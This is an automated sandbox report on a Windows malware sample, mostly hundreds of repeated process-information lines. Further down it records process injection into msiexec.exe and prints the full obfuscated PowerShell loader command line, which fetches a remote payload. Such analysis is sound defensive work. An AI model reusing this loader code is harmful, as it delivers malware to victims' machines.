Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 15_2_0040DD85
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4390 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5502 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5898 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3832 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe API coverage: 8.3 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7512 Thread sleep time: -3689348814741908s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7684 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8060 Thread sleep time: -119000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8064 Thread sleep time: -7554000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8064 Thread sleep time: -20976000s >= -30000s Jump to behavior
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0040AE51 FindFirstFileW,FindNextFileW, 15_2_0040AE51
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen, 16_2_00407EF8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 17_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen, 17_2_00407898
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00418981 memset,GetSystemInfo, 15_2_00418981
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: msiexec.exe, 00000008.00000003.2763354092.0000000008A01000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2735060631.0000000008A01000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2723001197.0000000008A01000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2743559628.0000000008A01000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2753540863.0000000008A01000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2735060631.0000000008A37000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2723001197.0000000008A37000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2715933734.0000000008A01000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2743559628.0000000008A37000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2753540863.0000000008A37000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2763354092.0000000008A37000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: bhv6BC6.tmp.15.dr Binary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
Source: msiexec.exe, 00000008.00000003.2735060631.0000000008A37000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2723001197.0000000008A37000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2743559628.0000000008A37000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2753540863.0000000008A37000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2763354092.0000000008A37000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2715933734.0000000008A37000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWee}
Source: powershell.exe, 00000003.00000002.1487036009.0000013FEA182000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\SysWOW64\msiexec.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 15_2_0040DD85
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW, 15_2_004044A4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe Jump to behavior
Source: Yara match File source: amsi64_7344.amsi.csv, type: OTHER
Source: Yara match File source: Process Memory Space: powershell.exe PID: 7344, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 7580, type: MEMORYSTR
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\msiexec.exe base: 4060000 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Chrimsel aflsser purificant #>;$Hydrosphere='Northumbria';<#Opkaldelses Torsionernes Certifiability Iconomachal Neutronerne Abv Afgiftningers #>;$Fileresdeologikritikkernes=$Lovregel+$host.UI; function viruserne($Tentaculite){If ($Fileresdeologikritikkernes) {$Gasapparats++;}$Fileresmitators=$Troldunges+$Tentaculite.'Length'-$Gasapparats; for( $Fileres=4;$Fileres -lt $Fileresmitators;$Fileres+=5){$Sempres=$Fileres;$Haccucal+=$Tentaculite[$Fileres];$Threadmaking='Bagstoppere';}$Haccucal;}function Vvningens($Smadrekassens){ & ($Hypogeic122) ($Smadrekassens);}$Taagngeres=viruserne 'R suMChlooMaalz Ko iCoerlSylflHyb.aDyrt/Delg ';$Taagngeres+=viruserne 'Comp5helb.Bai 0moth Rege(MaiiWBe aiTaranTam,d SuroTaanwFisksD.bk esiNSandTEunu Cayu1T nt0Rets.Sp j0Ster; Kha RetWBergi npan Sta6Peac4Parb; Woo VegxReto6Syne4 F,i; Nov MassrBondvStud:Yug,1Mu.v3Inge1A ur. pap0 Pil)Gimb Usk GCirce MilcEskok Svao C a/Kons2 Ell0Mure1Domi0 Kar0Edde1Tamm0 ato1Smut Re,mFG aciSte.rForveSalofTankoSmrexHuck/Miso1Dena3Gird1Bi d. Mid0Data ';$Uncorner=viruserne ',edgUVilds xtrE defROmdm-FolkaDrawGM thePrepnErnrT Mi. ';$Neuk=viruserne 'DelrhRacetHk rtRo kpTatasf.du:Over/Thra/StoreEqu tHavfhteisyK imsLasi. ,atrFistoViri/SmaaNthymo elinathyaUn fdReasdAtomiJibicPikatBureiStepnRg agO ga. DumqCounx EnedScri ';$Dacryd=viruserne 'Felt>Hjer ';$Hypogeic122=viruserne 'TrafIVinoe trixGono ';$Gar='Nondenunciatory';$Fejlfunktioner='\Trykimprgneredes.Ene';Vvningens (viruserne 'Sp.y$Ho.lG stoLAfv OkarlB EkaaNondLLent: Ud.Spe iU SamP,skve TerrDaemdBankUSuperGestA tirlValg=Lank$ IndE KatnBrobvLact: SenaInfoPTerrpJongD S saF rmt RetA.obb+ Lat$Ps,uFDesqEHowlJRis LArchFUnfeu jlkNulykkConsT E,iisi.toKerbNMusee Ha RWave ');Vvningens (viruserne 'Alte$W dlg KonlTra OTyvsB T aA laLExec:UddaMUna oBestST ilAUnasI MorKM.urkI,ideUnexr BarNB.rgePapi= .an$DopinSvr.eTrykuRebrKKatr. agiSFagsp Bdel dagi vi t.uss(Uds $F nzDS apasvanCUndeRK drY PredLege)Shin ');Vvningens (viruserne 'D.fi[,rayn adkEdragT Ido.Tri S DupETredRA skvSul,iSknlcIndiE UndP Re O rndiGuatnnondT S emFarvaStranP egAAuxoGUdlyEUdg,rClo 